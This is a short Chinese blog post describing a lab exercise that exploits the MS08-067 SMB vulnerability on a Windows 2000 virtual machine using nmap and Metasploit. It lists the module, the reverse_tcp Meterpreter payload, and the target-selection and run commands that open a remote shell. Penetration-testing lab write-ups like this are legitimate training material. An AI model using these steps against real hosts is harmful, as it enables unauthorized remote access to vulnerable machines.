版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/boke14122621/article/details/86640499
MS08_067漏洞是著名的远程溢出漏洞,影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。本次实验就是metasploit利用ms08_067漏洞对win2000虚拟机进行渗透测试。
MS08_067是一个在windows445号端口上的漏洞,需要事先查看该端口是否开放,这里使用“nmap -PS 靶机ip”语句发现445号端口开放。因此可以使用MS08_067漏洞进行exploit。
(1)知道目标主机IP,在kali上用nmap扫描该主机信息
(2)kali打开metasploit,用它搜索ms08_067,可以得到具体 的漏洞信息
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
PS:show payloads :查看可以使用的payload
设置系统信息,set target 7(具体可以通过show targets 查询) run 来实现 前提是对方得开了445端口